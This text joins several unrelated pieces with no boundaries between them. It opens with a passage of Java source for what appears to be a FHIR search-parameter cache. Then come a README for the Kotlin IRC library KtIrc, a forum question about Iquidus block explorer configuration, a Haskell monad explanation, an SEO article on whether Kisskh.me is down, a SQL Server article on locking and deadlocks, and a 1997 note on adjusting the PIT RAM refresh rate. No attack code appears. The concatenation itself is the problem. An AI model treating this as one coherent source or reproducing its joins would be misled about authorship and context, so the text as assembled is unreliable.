118 if (retVal == null) {
119 retVal = Collections.emptyList();
120 }
121 return Collections.unmodifiableList(retVal);
122 }
123
124 public Map<String, Map<String, RuntimeSearchParam>> getBuiltInSearchParams() {
125 return myBuiltInSearchParams;
126 }
127
128 private Map<String, RuntimeSearchParam> getSearchParamMap(Map<String, Map<String, RuntimeSearchParam>> searchParams, String theResourceName) {
129 Map<String, RuntimeSearchParam> retVal = searchParams.get(theResourceName);
130 if (retVal == null) {
131 retVal = new HashMap<>();
132 searchParams.put(theResourceName, retVal);
133 }
134 return retVal;
135 }
136
137 public abstract IFhirResourceDao<SP> getSearchParameterDao();
138
139 private void populateActiveSearchParams(Map<String, Map<String, RuntimeSearchParam>> theActiveSearchParams) {
140 Map<String, List<JpaRuntimeSearchParam>> activeUniqueSearchParams = new HashMap<>();
141 Map<String, Map<Set<String>, List<JpaRuntimeSearchParam>>> activeParamNamesToUniqueSearchParams = new HashMap<>();
142
143 Map<String, RuntimeSearchParam> idToRuntimeSearchParam = new HashMap<>();
144 List<JpaRuntimeSearchParam> jpaSearchParams = new ArrayList<>();
145
146 /*
147 * Loop through parameters and find JPA params
148 */
149 for (Map.Entry<String, Map<String, RuntimeSearchParam>> nextResourceNameToEntries : theActiveSearchParams.entrySet()) {
150 List<JpaRuntimeSearchParam> uniqueSearchParams = activeUniqueSearchParams.get(nextResourceNameToEntries.getKey());
151 if (uniqueSearchParams == null) {
152 uniqueSearchParams = new ArrayList<>();
153 activeUniqueSearchParams.put(nextResourceNameToEntries.getKey(), uniqueSearchParams);
154 }
155 Collection<RuntimeSearchParam> nextSearchParamsForResourceName = nextResourceNameToEntries.getValue().values();
156 for (RuntimeSearchParam nextCandidate : nextSearchParamsForResourceName) {
157
158 if (nextCandidate.getId() != null) {
159 idToRuntimeSearchParam.put(nextCandidate.getId().toUnqualifiedVersionless().getValue(), nextCandidate);
160 }
161
162 if (nextCandidate instanceof JpaRuntimeSearchParam) {
163 JpaRuntimeSearchParam nextCandidateCasted = (JpaRuntimeSearchParam) nextCandidate;
164 jpaSearchParams.add(nextCandidateCasted);
165 if (nextCandidateCasted.isUnique()) {
166 uniqueSearchParams.add(nextCandidateCasted);
167 }
168 }
169 }
170
171 }
172
173 Set<String> haveSeen = new HashSet<>();
174 for (JpaRuntimeSearchParam next : jpaSearchParams) {
175 if (!haveSeen.add(next.getId().toUnqualifiedVersionless().getValue())) {
176 continue;
177 }
178
179 Set<String> paramNames = new HashSet<>();
180 for (JpaRuntimeSearchParam.Component nextComponent : next.getComponents()) {
181 String nextRef = nextComponent.getReference().getReferenceElement().toUnqualifiedVersionless().getValue();
182 RuntimeSearchParam componentTarget = idToRuntimeSearchParam.get(nextRef);
183 if (componentTarget != null) {
184 next.getCompositeOf().add(componentTarget);
185 paramNames.add(componentTarget.getName());
186 } else {
187 ourLog.warn("Search parameter {} refers to unknown component {}", next.getId().toUnqualifiedVersionless().getValue(), nextRef);
188 }
189 }
190
191 if (next.getCompositeOf() != null) {
192 Collections.sort(next.getCompositeOf(), new Comparator<RuntimeSearchParam>() {
193 @Override
194 public int compare(RuntimeSearchParam theO1, RuntimeSearchParam theO2) {
195 return StringUtils.compare(theO1.getName(), theO2.getName());
196 }
197 });
198 for (String nextBase : next.getBase()) {
199 if (!activeParamNamesToUniqueSearchParams.containsKey(nextBase)) {
200 activeParamNamesToUniqueSearchParams.put(nextBase, new HashMap<Set<String>, List<JpaRuntimeSearchParam>>());
201 }
202 if (!activeParamNamesToUniqueSearchParams.get(nextBase).containsKey(paramNames)) {
203 activeParamNamesToUniqueSearchParams.get(nextBase).put(paramNames, new ArrayList<JpaRuntimeSearchParam>());
204 }
205 activeParamNamesToUniqueSearchParams.get(nextBase).get(paramNames).add(next);
206 }
207 }
208 }
209
210 myActiveUniqueSearchParams = activeUniqueSearchParams;
211 myActiveParamNamesToUniqueSearchParams = activeParamNamesToUniqueSearchParams;
212 }
213
214 @PostConstruct
215 public void postConstruct() {
216 Map<String, Map<String, RuntimeSearchParam>> resourceNameToSearchParams = new HashMap<>();
217
218 myResourceDaos = new ArrayList<>();
219 Map<String, IFhirResourceDao> daos = myApplicationContext.getBeansOfType(IFhirResourceDao.class, false, false);
220 for (IFhirResourceDao next : daos.values()) {
221 myResourceDaos.add(next);
222 }
223
224 for (IFhirResourceDao<?> nextDao : myResourceDaos) {
225 RuntimeResourceDefinition nextResDef = myCtx.getResourceDefinition(nextDao.getResourceType());
226 String nextResourceName = nextResDef.getName();
227 HashMap<String, RuntimeSearchParam> nameToParam = new HashMap<>();
228 resourceNameToSearchParams.put(nextResourceName, nameToParam);
229
230 for (RuntimeSearchParam nextSp : nextResDef.getSearchParams()) {
231 nameToParam.put(nextSp.getName(), nextSp);
232 }
233 }
234
235 myBuiltInSearchParams = Collections.unmodifiableMap(resourceNameToSearchParams);
236
237 refreshCacheIfNecessary();
238 }
239
240 @Override
241 public void refreshCacheIfNecessary() {
242 long refreshInterval = 60 * DateUtils.MILLIS_PER_MINUTE;
243 if (System.currentTimeMillis() - refreshInterval > myLastRefresh) {
244 synchronized (this) {
245 if (System.currentTimeMillis() - refreshInterval > myLastRefresh) {
246 StopWatch sw = new StopWatch();
247
248 Map<String, Map<String, RuntimeSearchParam>> searchParams = new HashMap<>();
249 for (Map.Entry<String, Map<String, RuntimeSearchParam>> nextBuiltInEntry : getBuiltInSearchParams().entrySet()) {
250 for (RuntimeSearchParam nextParam : nextBuiltInEntry.getValue().values()) {
251 String nextResourceName = nextBuiltInEntry.getKey();
252 getSearchParamMap(searchParams, nextResourceName).put(nextParam.getName(), nextParam);
253 }
254 }
255
256 SearchParameterMap params = new SearchParameterMap();
257 params.setLoadSynchronousUpTo(MAX_MANAGED_PARAM_COUNT);
258
259 IBundleProvider allSearchParamsBp = getSearchParameterDao().search(params);
260 int size = allSearchParamsBp.size();
261
262 // Just in case..
263 if (size >= MAX_MANAGED_PARAM_COUNT) {
264 ourLog.warn("Unable to support >" + MAX_MANAGED_PARAM_COUNT + " search params!");
265 size = MAX_MANAGED_PARAM_COUNT;
266 }
267
268 List<IBaseResource> allSearchParams = allSearchParamsBp.getResources(0, size);
269 for (IBaseResource nextResource : allSearchParams) {
270 SP nextSp = (SP) nextResource;
271 if (nextSp == null) {
272 continue;
273 }
274
275 RuntimeSearchParam runtimeSp = toRuntimeSp(nextSp);
276 if (runtimeSp == null) {
277 continue;
278 }
279
280 for (String nextBaseName : SearchParameterUtil.getBaseAsStrings(myCtx, nextSp)) {
281 if (isBlank(nextBaseName)) {
282 continue;
283 }
284
285 Map<String, RuntimeSearchParam> searchParamMap = getSearchParamMap(searchParams, nextBaseName);
286 String name = runtimeSp.getName();
287 if (myDaoConfig.isDefaultSearchParamsCanBeOverridden() || !searchParamMap.containsKey(name)) {
288 searchParamMap.put(name, runtimeSp);
289 }
290
291 }
292 }
293
294 Map<String, Map<String, RuntimeSearchParam>> activeSearchParams = new HashMap<>();
295 for (Map.Entry<String, Map<String, RuntimeSearchParam>> nextEntry : searchParams.entrySet()) {
296 for (RuntimeSearchParam nextSp : nextEntry.getValue().values()) {
297 String nextName = nextSp.getName();
298 if (nextSp.getStatus() != RuntimeSearchParam.RuntimeSearchParamStatusEnum.ACTIVE) {
299 nextSp = null;
300 }
301
302 if (!activeSearchParams.containsKey(nextEntry.getKey())) {
303 activeSearchParams.put(nextEntry.getKey(), new HashMap<>());
304 }
305 if (activeSearchParams.containsKey(nextEntry.getKey())) {
306 ourLog.debug("Replacing existing/built in search param {}:{} with new one", nextEntry.getKey(), nextName);
307 }
308
309 if (nextSp != null) {
310 activeSearchParams.get(nextEntry.getKey()).put(nextName, nextSp);
311 } else {
312 activeSearchParams.get(nextEntry.getKey()).remove(nextName);
313 }
314 }
315 }
316
317 myActiveSearchParams = activeSearchParams;
318
319 populateActiveSearchParams(activeSearchParams);
320
321 myLastRefresh = System.currentTimeMillis();
322 ourLog.info("Refreshed search parameter cache in {}ms", sw.getMillis());
323 }
324 }
325 }
326 }
327
328 @Scheduled(fixedDelay = 10 * DateUtils.MILLIS_PER_SECOND)
329 public void refreshCacheOnSchedule() {
330 refreshCacheIfNecessary();
331 }
332
333 @Override
334 public void setApplicationContext(ApplicationContext theApplicationContext) throws BeansException {
335 myApplicationContext = theApplicationContext;
336 }
337
338 protected abstract RuntimeSearchParam toRuntimeSp(SP theNextSp);
339
340
341 }
Chris Smith e6e36b93cd Use openjdk12 not the non-existant oraclejdk12 3 months ago
docs More work on docs 5 months ago
gradle/wrapper Dependency updates 3 months ago
src Dependency updates 3 months ago
.gitignore Support message tags v3.3, replies 6 months ago
.travis.yml Use openjdk12 not the non-existant oraclejdk12 3 months ago
CHANGELOG.adoc Fix occasional buffer overflow on TLS connections 5 months ago
LICENCE.adoc Convert top level docs to asciidoc 5 months ago
README.adoc Convert top level docs to asciidoc 5 months ago
build.gradle.kts Dependency updates 3 months ago
gradlew Dependency updates 3 months ago
gradlew.bat Dependency updates 3 months ago
README.adoc
= KtIrc
Chris Smith
image:https://travis-ci.org/csmith/KtIrc.svg?branch=master[Build status, link=https://travis-ci.org/csmith/KtIrc]
image:https://api.codacy.com/project/badge/Grade/c01221cbf9cf413ba4d94cb8c80e334a[Code quality, link=https://www.codacy.com/app/csmith/KtIrc]
image:https://codecov.io/gh/csmith/KtIrc/branch/master/graph/badge.svg[Code coverage, link=https://codecov.io/gh/csmith/KtIrc]
image:https://api.bintray.com/packages/dmdirc/releases/ktirc/images/download.svg[Latest version, link=https://bintray.com/dmdirc/releases/ktirc/_latestVersion]
image:https://img.shields.io/badge/documentation-d11n-brightgreen.svg[Documentation, link=https://ktirc.d11n.dev/]
KtIrc is a Kotlin JVM library for connecting to and interacting with IRC servers.
It is still in an early stage of development.
== Features
.Built for Kotlin
KtIrc is written in and designed for use in Kotlin; it uses extension methods,
DSLs, sealed classes, and so on, to make it much easier to use than an
equivalent Java library.
.Coroutine-powered
KtIrc uses co-routines for all of its input/output which lets it deal with
IRC messages in the background while your app does other things, without
the overhead of creating a new thread per IRC client.
.Modern IRC standards
KtIrc supports many IRCv3 features such as SASL authentication, message IDs,
server timestamps, replies, reactions, account tags, and more. These features
(where server support is available) make it easier to develop bots and
clients, and enhance IRC with new user-facing functionality.
== Setup
KtIrc is published to JCenter, so adding it to a gradle build is as simple as:
[source,groovy]
----
repositories {
jcenter()
}
dependencies {
implementation("com.dmdirc:ktirc:<VERSION>")
}
----
== Usage
Clients are created using a DSL and the `IrcClient` function. At a minimum
you must specify a server and a profile. A simple bot might look like:
[source,kotlin]
----
val client = IrcClient {
server {
host = "my.server.com"
}
profile {
nickname = "nick"
username = "username"
realName = "Hi there"
}
}
client.onEvent { event ->
when (event) {
is ServerReady ->
client.sendJoin("#ktirc")
is ServerDisconnected ->
client.connect()
is MessageReceived ->
if (event.message == "!test")
client.reply(event, "Test successful!")
}
}
client.connect()
----
== Documentation
You can view the latest documentation for KtIrc at https://ktirc.d11n.dev/.
== Developing KtIrc
=== Lifecycle of a message
image:docs/sequence.png[Architecture diagram]
The `LineBufferedSocket` class receives bytes from the IRC server. Whenever it
encounters a complete line (terminated by a `CR`, `LF` or `CRLF`), it passes it
to the `IrcClient` as a `ByteArray`. The `MessageParser` breaks up the line
into its component parts (tags, prefixes, commands, and parameters) and returns
them as an `IrcMessage`.
The `IrcMessage` is given to the `MessageHandler`, which tries to find a
processor that can handle the command in the message. The processor's job is
to convert the message into an `IrcEvent` subclass. Processors do not get
given any contextual information or state, their job is simply to convert
the message as received into an event.
The events are returned to the `MessageHandler` which then passes them on
to all registered event handlers. The job of the event handlers is twofold:
firstly, use the events to update the state of KtIrc (for example, after
receiving a `JOIN` message, the `ChannelStateHandler` will add the user
to the list of users in the channel, while the `UserStateHandler` may update
the user's hostname if we hadn't previously seen it). Secondly, the event
handlers may themselves raise events. This is useful for higher-order
events such as `ServerReady` that depend on a variety of factors and
states.
Handlers themselves may not keep state, as they will be shared across
multiple instances of `IrcClient` and won't be reset on reconnection.
State is instead stored in the various `*State` properties of the
`IrcClient` such as `serverState` and `channelState`. Fields that
should not be exposed to users of KtIrc can be placed in these
public state objects but marked as `internal`.
All the generated events (from processors or from event handlers) are
passed to the `IrcClient`, which in turn passes them to the library
user via the delegates passed to the `onEvent` method.
=== Contributing
Contributing is welcomed and encouraged! Please try to add unit tests for new features,
and maintain a code style consistent with the existing code.
=== Licence
The code in this repository is released under the MIT licence. See the
link:LICENCE.adoc[LICENCE] file for more info.
blockchain – Understanding the configuration of the iquidus API
I am trying to understand the values they ask for in the configuration, which are needed to install the Iquidus block explorer. I know how to get the genesis block, since I hard-coded it when I made a fork to create a new altcoin; however, I'm not sure how to get the genesis_tx. I know it can be derived from the genesis block, but I'm not sure how.
"genesis": {
"genesis_tx": "",
"genesis_block": ""}
As for the configuration of the API, they request an address, block index, blockhash, and txhash. The block index can be any value within the height of your chain... so do I choose any value for the index with a corresponding address from that block's transaction list? Also, how do I get the txhash and the blockhash? In my opinion, these values are subject to change, and I know they are stored in the blockchain... Does anyone know how I can retrieve this information?
"api": {
"blockindex": "",
"blockhash": "",
"txhash": "",
"address": ""
}
I appreciate your time and consideration.
View Light
What is a monad?
IMO these things are best understood through the lens of Haskell's `Maybe` type.
Very simply, a `Maybe Int` for example can be either `Just 5` or `Nothing`. At its most basic form, it can be used with pattern matching. For example here's a haskell function that adds 2 to a Maybe if it's there:
add2 :: Maybe Int -> Maybe Int
add2 (Just n) = Just (n + 2)
add2 Nothing = Nothing
You can see we had to use pattern matching to "unwrap" the actual value of the maybe so we could add 2 to it. This is pretty inconvenient and pretty annoying especially if you're trying to do something more complex than simply adding 2. That's where `Functor` comes in.
`Functor` allows you to apply a function to the value inside the functor and get back the modified functor by using the `fmap` function. Here's what that definition looks like:
fmap :: Functor f => (a -> b) -> f a -> f b
This definition is a bit complex so I'll break it down. This is saying "fmap is a function which is defined for any `Functor` `f`. This function accepts a different function from `a` to `b`; and a functor containing an `a`; and returns a functor containing a `b`." `a` and `b` can be any type. What makes something a functor at the very base level is whether or not this function is defined. You can think about it like mapping over a list in any other language because that's exactly what `fmap` is defined as for lists.
So in our `Maybe` example, we can use it like so:
add2 :: Maybe Int -> Maybe Int
add2 x = fmap (+ 2) x
-- or
add2 x = (+ 2) <$> x -- <$> is just an infix version of fmap; same exact function.
Much more convenient, and as an added bonus it looks a bit more like regular function application (in haskell anyway).
We're not quite to monads yet because there's a step between `Functor` and `Monad` and that's called `Applicative`. Instead of starting with the (somewhat confusing) definition, let me pose a question: what if I have a function with more than one argument that I want to pass `Maybe`s into? Like what if I wanted to add two `Maybe` values together? That's the problem applicative solves.
With functors we can do:
(+ 2) <$> x
But with an applicative instance we can do:
(+) <$> maybeA <*> maybeB
the result of which will be a `Maybe` containing the result of adding the two values inside. If either of the `Maybe` values are `Nothing` it will come out as `Nothing`. And this pattern is extendable for more than just two arguments as well. For example:
functionWithManyNonMaybeArguments <$> maybeA <*> maybeB <*> maybeC <*> maybeD
So to quickly summarize: functors allow you to apply a function to the inside of one "wrapped" value (like `Maybe`). Applicatives allow you to apply a function of many arguments to many "wrapped" values. Now, here's where we get to monads. Here's a situation you might be in:
someFn :: a -> Maybe c
someMaybe :: Maybe a
How would you feed that `someMaybe` value into the `someFn` function? You might guess to use `fmap` from functor, but let's look at what would happen:
fmap someFn someMaybe
fmap :: Functor f => (a -> b) -> f a -> f b
-- so in this case
fmap :: Functor Maybe => (a -> Maybe c) -> Maybe a -> Maybe (Maybe c)
-- so
fmap someFn someMaybe :: Maybe (Maybe c)
Oof, a double-wrapped `Maybe`; that's not right. This is the problem `Monad` solves with the `bind` function or `>>=` operator. The correct code for this would be:
bind :: Monad m => m a -> (a -> m b) -> m b -- again, >>= is just an infix version of bind; exact same thing.
someMaybe >>= someFn :: Maybe c
Also worth noting that for something to be a `Monad` it must also be `Applicative` and for something to be `Applicative` it must also be a `Functor`. So all monads are also applicatives and functors.
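Putting all three together in one small runnable example (standard Prelude only, nothing fancy):

safeDiv :: Int -> Int -> Maybe Int
safeDiv _ 0 = Nothing
safeDiv x y = Just (x `div` y)

main :: IO ()
main = do
  print (fmap (+ 2) (Just 5))          -- Just 7   (Functor)
  print ((+) <$> Just 3 <*> Just 4)    -- Just 7   (Applicative)
  print (Just 10 >>= safeDiv 100)      -- Just 10  (Monad: no double-wrapping)
  print (Just 0 >>= safeDiv 100)       -- Nothing  (failure short-circuits)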
Sorry if you don't know any Haskell, because this is pretty complex and very Haskell-focused, but I kinda figured you wouldn't be asking these questions without a passing familiarity with it. Feel free to ask any questions; I love talking about this stuff!
Rating: (You must be logged in to vote)
Reply
Is Kisskh.me Down? Understanding Access Issues and Solutions
In the digital age, where online platforms serve as critical gateways to entertainment, information, and social interaction, encountering downtime can be particularly frustrating. This is especially true for users of Kisskh.me, a platform that has carved out its niche among internet users. If you’ve found yourself asking, Is Kisskh.me down? you’re not alone. This article delves into the potential reasons behind Kisskh.me’s accessibility issues and provides actionable solutions to help you navigate these digital hiccups.
Is Kisskh.me Down?
The first question that comes to mind when encountering difficulties accessing Kisskh.me is whether the site is down altogether. Several factors could contribute to this, including server issues, maintenance, or domain-related problems.
To check if Kisskh.me is down, users can employ various online tools designed for this purpose, such as DownDetector or IsItDownRightNow. These platforms provide real-time information on the status of websites, helping users determine if the problem lies with Kisskh.me itself or their own internet connection.
Common Causes of Downtime
Several factors can contribute to Kisskh.me being inaccessible at times. These range from server-related issues, such as maintenance or unexpected technical problems, to network connectivity issues on the user's end. Additionally, domain problems, coding errors, and cyber threats like DDoS attacks can all lead to the site being down. Understanding the root cause is the first step in resolving the issue and restoring access to the site.
Troubleshooting Access Issues
When faced with downtime, there are several troubleshooting steps users can take. First, verify whether the issue is isolated to Kisskh.me by checking other websites. If they're accessible, the problem likely lies with Kisskh.me. Refreshing the page, clearing your browser's cache, and changing DNS settings are basic steps that can resolve many access issues. For more persistent problems, using a VPN might help, particularly if the site is regionally restricted or if your network is experiencing connectivity issues.
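As a quick illustration of the "is it just me?" check, here is a short Python sketch (the hostnames and port are examples): it tests whether a host resolves and accepts a TCP connection from your machine.

```python
import socket

def can_connect(host: str, port: int = 443, timeout: float = 5.0) -> bool:
    """Return True if we can resolve `host` and open a TCP connection to it."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:  # covers DNS failure, connection refusal, and timeouts
        return False

# Compare the target site against a site known to be up. If the second
# check succeeds while the first fails, the problem is likely with the
# site rather than with your own connection.
print(can_connect("kisskh.me"))
print(can_connect("example.com"))
```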
Preventative Measures and Solutions
To minimize future disruptions, staying informed about planned maintenance and updates via Kisskh.me's social media channels can be beneficial. Employing regular cybersecurity practices, such as updating software and using robust antivirus solutions, can also protect against cyber threats that might cause downtime. Moreover, keeping regular backups and using alternative access points, like mobile data instead of Wi-Fi, can help ensure continuous access despite network issues.
Understanding Access Issues:
Even if Kisskh.me is only partially down, users may still encounter access issues preventing them from using the site effectively. These issues can range from slow loading times to error messages or even being unable to reach the site altogether.
Some common access issues users may face include:
FAQs
Q: How can I check if Kisskh.me is down?
A: Utilize down detector services online or try accessing the site from different devices and networks to determine if the issue is widespread or localized.
Q: What should I do if Kisskh.me is not loading only for me?
A: Check your internet connection, clear your browser cache, or switch to a different browser. If the problem persists, consider using a VPN.
Q: Can network issues on my end be causing Kisskh.me to be inaccessible?
A: Yes, issues like weak Wi-Fi signals, ISP restrictions, or outdated DNS settings can affect your ability to access Kisskh.me.
Q: What are the best practices to avoid future downtime with Kisskh.me?
A: Follow Kisskh.me on social media for updates, use reliable DNS servers, and ensure your internet connection is stable.
Understanding the complexities behind website downtime and implementing the suggested solutions can significantly enhance your online experience, ensuring that disruptions are swiftly resolved. Remember, the digital world is dynamic, and staying informed and prepared is critical to navigating its challenges.
Locking, Blocking and Deadlocking
By Wayne Sheffield
I wish that I had a dollar for every time someone came to me, all excited and worried, telling me “We’ve got locking going on in this SQL Server instance”. My usual response is “Yep, we sure do. Isn’t it great?!” In this article, we’ll discuss locking in SQL Server, why it’s good, and what happens when it gets out of control.
Locking is a mechanism built in to SQL Server in order to ensure transactional integrity and database consistency between concurrent transactions. It prevents transactions from reading data that has yet to be committed from other transactions, and it also prevents multiple transactions from attempting to modify the same data at the same time. A transaction will place locks on various resources that it is dependent upon, so that other transactions cannot change the resource in a way that would be incompatible with what this transaction is doing. The transaction is responsible for clearing the lock when the transaction no longer needs it.
Since locking is closely coupled with transactions, let’s take a quick look at what transactions do. Think of a transaction as a logical unit of work. This can be as simple as performing an operation on a single row in a single table – or it could be performing an operation on multiple rows, possibly in multiple tables. Perhaps the transaction is inserting a new employee into the employee table. Or inserting a complex sales order, with a summary and line item details, and there are triggers that fire off manufacturing orders for various parts.
Each logical unit of work has four properties that it must satisfy; collectively, these are referred to as the ACID properties. They are:
• Atomicity – the transaction must be atomic: either all of its actions are performed, or none of them. You cannot have it do some, but not the other.
• Consistency – when the transaction is completed, all of the data must be in a consistent state. All rules must be applied, and all internal structures must be correct at the end of the transaction.
• Isolation – modifications made by concurrent transactions must be isolated from all other concurrent transactions. The data seen by a transaction will be either the data seen before other transactions have made modifications, or after the other transactions have completed, but not any intermediate state. (If a second transaction is modifying two rows, the first transaction cannot see a change to the first row and the original state of the second row.)
• Durability – when completed, the changes made by a transaction are permanently stored in the system, and they will persist even in the event of a system failure. At a minimum, this requires that the changes made by the transaction to have been written out to disk in the transaction log file.
Let’s take a quick look at Atomicity in action. The following example inserts three rows into a table:
DECLARE @TransactionTest TABLE (
ID INT PRIMARY KEY,
SomeCol VARCHAR(20)
);
INSERT INTO @TransactionTest (ID, SomeCol) VALUES (0,'Row1');
INSERT INTO @TransactionTest (ID, SomeCol) VALUES (1,'Row2');
INSERT INTO @TransactionTest (ID, SomeCol) VALUES (1,'Row3');
SELECT * FROM @TransactionTest;
In this example, each row being inserted is being performed by a separate statement, so each is a separate transaction (assuming the default SSMS settings for implicit transactions). Since a transaction was not specified, each statement is an implicit transaction. The third insert produces a primary key violation (which would leave the database with inconsistent data), so that statement fails. When the table is queried, it can be seen that the first two rows have been inserted.
However, if this data were to be inserted as one statement:
DECLARE @TransactionTest TABLE (
ID INT PRIMARY KEY,
SomeCol VARCHAR(20)
);
INSERT INTO @TransactionTest (ID, SomeCol)
VALUES
(0,'Row1'),
(1,'Row2'),
(1,'Row3');
SELECT * FROM @TransactionTest;
In this example, all three rows are being inserted in a single statement. The primary key violation still occurs, so the statement fails. When the table is queried, it can be seen that none of the records have been inserted – the transaction failed, and atomicity requires that none of its actions be performed, so the first two rows have been undone. In SQL Server, this is called a rollback – the actions that this transaction has performed are rolled back to their original state.
As a transaction runs, it will place various locks on various resources in order to accomplish its task. Unfortunately, it’s not as simple as just placing a lock on a single row, making the change to that row, and removing the lock. If multiple locks are being placed on a page, a lock at the page level may be issued instead. Locks may be placed on multiple rows, either on the same page or multiple pages. Each lock is necessary to protect a resource, however each lock requires memory. If too many locks are being placed, a strain can be put upon the memory in the system.
To alleviate this, the system has a Lock Escalation mechanism, where locks can be placed on a higher level resource to protect everything underneath it. When lock escalation kicks in, the rows or pages that are being locked will be escalated to a table lock (if this is a partitioned table, and if configured to do so, this can go to the partition level before the table level). Note that rows or pages are escalated to table level locks – row locks are never escalated to page level locks.
When the higher level lock is placed, the lower level locks are then released to ease the memory pressure.
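If escalation itself becomes a problem for a specific table, SQL Server 2008 and later let you control the escalation target per table (the table name below is illustrative):

-- TABLE (default) | AUTO (partition-level on partitioned tables) | DISABLE
ALTER TABLE dbo.SomeTable SET (LOCK_ESCALATION = AUTO);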
As you can see, locking in SQL Server is a normal event, and it is essential to ensure that the data in the database is consistent.
There are various lock modes that a transaction can use to protect itself. Some of these lock modes are compatible with other lock modes, and others are incompatible with each other. When one transaction is running that has locks on resources, and another transaction comes along trying to place incompatible locks on the same resources, then the second transaction has to wait until the first transaction is complete before it can proceed – the first transaction is blocking the second transaction from running.
Considering all that locks do, it is easy to understand that blocking itself is a natural event within SQL Server. If the transactions are short, the blocking may never even be noticed. However, if there is a long-running transaction, then the blocking may really be noticed. If the operations are on a busy table, the application may itself seem to be unresponsive while it waits for queries to return – queries that are being blocked by this long-running transaction.
There may also be blocking issues if there is a hot spot in the database. One well known hot spot is the allocation pages within the tempdb database. If queries use a lot of temporary tables / table variables or spill out of memory, then these pages which track the allocations of these temporary objects will become a hot spot of activity, and as the objects are created, the allocation pages have short-term locks placed on them. If you happen to have a lot of this going on, then this can start blocking other transactions from creating their temporary objects, slowing transactions down.
Faster hardware doesn’t solve the blocking problem – it just shortens the time that the locks are being held. Frequently, the queries involved will need to be optimized (recoded to support optimal retrieval, possibly adding / modifying indexes) for optimal performance. If blocking is caused by a hot spot, a database redesign may even be in order.
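To see which sessions are currently blocked and which session is doing the blocking, you can query the dynamic management views (SQL Server 2005 and later; requires VIEW SERVER STATE permission):

SELECT r.session_id,
       r.blocking_session_id,
       r.wait_type,
       r.wait_time
FROM sys.dm_exec_requests AS r
WHERE r.blocking_session_id <> 0;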
The worse kind of blocking is a deadlock. A deadlock occurs when one transaction has a lock on one resource, and another transaction has a lock on a second resource. Each transaction then attempts to acquire a lock on the resource that the other transaction has locked. (It is also possible for there to be a chain of transactions involved, where transaction 1 needs the resource locked by transaction 2, which needs the resource locked by transaction 3, which needs the resource locked by transaction 1.)
When this happens, both transactions will wait forever for the other transaction to finish – they are both dead, waiting for locks to clear. Since they are waiting on each other, they will never clear. SQL Server has a mechanism for detecting deadlocks, and this mechanism will select one of the transactions to be terminated and rolled back. The transaction chosen to be the deadlock victim is dependent upon the deadlock priority of the transactions, and the amount of work necessary be rolled back. If the transactions are running with the same deadlock priority, the transaction with the least amount of work to be rolled back will be chosen as the deadlock victim; if the deadlock priorities are different, the transaction with the lowest deadlock priority will be chosen as the deadlock victim.
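You can influence which transaction is chosen as the victim with SET DEADLOCK_PRIORITY; the batch below is illustrative:

-- A lower priority makes this session the preferred deadlock victim.
SET DEADLOCK_PRIORITY LOW;  -- accepts LOW, NORMAL, HIGH, or an integer from -10 to 10
BEGIN TRANSACTION;
-- ... work that might deadlock ...
COMMIT TRANSACTION;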
Let’s engineer a deadlock and watch how it works in action. In SSMS, open up two query windows. In the first window, run the following code to create a global temporary table and two put two rows into this table. The code then starts an explicit transaction, and updates one of the rows:
-- Create a global temp table and put two rows into it
CREATE TABLE ##DeadlockTest (Col1 INT CONSTRAINT PK PRIMARY KEY);
INSERT INTO ##DeadlockTest ( Col1 )
VALUES (5),
(15);
GO
BEGIN TRANSACTION;
UPDATE ##DeadlockTest
SET Col1 = Col1 + 10000
WHERE Col1 = 5;
Now go to the second query window, and enter and run the following code:
BEGIN TRANSACTION;
UPDATE ##DeadlockTest
SET Col1 = Col1 + 10000
WHERE Col1 = 15;
UPDATE ##DeadlockTest
SET Col1 = Col1 + 10000
WHERE Col1 = 5;
Notice that the query does not complete – The second update statement is being blocked by the update statement that was run in the first query window. Now, return to the first window, and enter and run just the following code:
UPDATE ##DeadlockTest
SET Col1 = Col1 + 10000
WHERE Col1 = 15;
At this point, you have created a deadlock. In the first query window, there is a lock on the table on the row where Col1 = 5. The second query window has a lock on the row where Col1=15. The second query window is attempting to place a lock on the row where Col1 = 5, and the first query window is attempting to place a lock on the row where Col1 = 15. If nothing were to intervene, both of these transactions would sit here forever, waiting for the resource that it needs to be cleared. Fortunately, SQL Server detects this deadlock condition, and selects one of the transactions to be the deadlock victim, terminating that statement and rolling back the changes that it has made.
We still need to clean up, so in the query window that was not selected as the victim, run:
ROLLBACK TRANSACTION;
And in the first query window, run the following statement to drop the table:
DROP TABLE ##DeadlockTest;
Summary
In summary, we have a natural progression of events going on during a transaction. The transaction places locks on the various resources it needs to protect the referential integrity and database consistency. These locks will block other transactions from acquiring locks on the same resources until the transaction with the lock clears the lock (by either completing or being rolled back). These actions (locking and blocking) are completely normal events within SQL Server, and are to be expected.
However, if you have a long running transaction, this can create long-term blocking in the database, preventing other work from going on. And if two different transactions enter into a deadlock situation, SQL Server will terminate one of the transactions so that the system is not locked up. Neither of these situations is desirable, and changes will be necessary in order to prevent these from happening again.
And now you can see why it’s so great that there is locking going on in SQL Server.
Reference
http://technet.microsoft.com/en-us/library/jj856598.aspx (SQL Server Transaction Locking and Row Versioning Guide)
VnutZ Domain
Copyright © 1996 - 2018 [Matthew Vea] - All Rights Reserved
1997-04-27
Featured Article
Programmatically Adjusting the RAM Refresh Rate
I recently found this old gem I wrote back in high school while digging through and purging garbage from the old "My Documents" folder. As I alluded to in my "Reflecting on a Quarter Century Online," there was a book I stumbled across in the library that opened a new door on programming for me that revealed how a Pascal programmer (high school remember?) could access a PC's underlying hardware. Between that and some articles I found on the Internet, I reprogrammed the PIT chip on my old 386SX to get a performance boost!
MEM-RATE v1.11 allows you to adjust the setting of your 8253 PIT timer 1. DRAM chips relied on capacitors to keep a charge present and needed a periodic refresh in order to prevent data corruption. The Programmable Interval Timer Channel 1 drove the refresh logic to the memory chips. Setting the refresh rate too low can cause the capacitors to discharge, resulting in the chips losing their contents, which in turn induces an NMI MEMORY PARITY ERROR and crashes the machine. Most computers require at least a 5 kHz refresh rate to maintain system integrity. (NOTE: This function became moot on modern hardware, where the refresh is handled natively out-of-band.)
The advantage to adjusting your computer's refresh rate is improved system performance. The PIT interrupts the CPU in order to conduct the memory refresh. Therefore, the less your CPU is interrupted by the PIT, the more cycles are available for actual processing. The disadvantage to reducing the refresh rate arises in memory failure (only at LOW levels) and reduced hard disk performance. The HD's timers are intimately linked with this interrupt for motor timing. Although new rates will not affect HD data, it will slow down your access.
